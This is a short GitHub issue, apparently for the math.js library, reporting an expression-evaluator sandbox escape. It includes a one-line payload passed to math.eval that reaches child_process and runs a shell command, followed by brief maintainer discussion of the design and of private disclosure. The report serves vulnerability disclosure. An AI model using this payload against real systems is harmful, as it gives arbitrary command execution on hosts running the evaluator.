Join GitHub today
GitHub is home to over 28 million developers working together to host and review code, manage projects, and build software together.Sign up
more eval exploits #821
math.eval('["//","a/*\\nreturn process.mainModule.require"]._data.map(cos.constructor)()("child_process").execSync("ps >&2")');
Unfortunately, this is pretty much a fundamentally insecure design.
Thanks a lot @comex
Can you elaborate why you think this is the case?
So far the security issues that I've seen all boil down to accessing
As a side note: @comex I would prefer reporting new security issues in private rather than here in a public issue. We plug them asap but it may not always be possible to apply a fast fix for whatever reason.